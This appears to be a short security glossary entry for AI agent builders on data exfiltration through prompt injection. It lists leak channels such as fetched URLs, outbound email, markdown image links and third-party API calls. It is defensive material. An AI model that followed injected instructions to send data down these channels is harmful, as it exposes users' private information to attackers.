Data exfiltration

An attack that tricks an AI system into sending sensitive data to a destination the attacker controls.

AI systems can leak data through channels that traditional security tools never anticipated. A model tricked by prompt injection might embed a user's private information in a URL it fetches, letting the attacker read the data from their server logs. It could attach confidential details to an outbound email, encode secrets in a markdown image link that pings an external server, or include private records in an API call to a third-party service. AI agents routinely process sensitive data and use tools that reach the outside world, so every outbound action becomes a potential leak path.

Builder example

If your AI agent can read customer data and also send emails, make API calls, or fetch URLs, a single successful prompt injection could turn it into a data pipeline straight to the attacker. The model does not need to 'decide' to leak data. It just needs to follow one cleverly hidden instruction.

Common confusion: Many teams focus on preventing sensitive data from appearing in the model's visible text output. The larger risk is data leaving through tool calls, URL parameters, and API requests: channels end users never see in the chat window.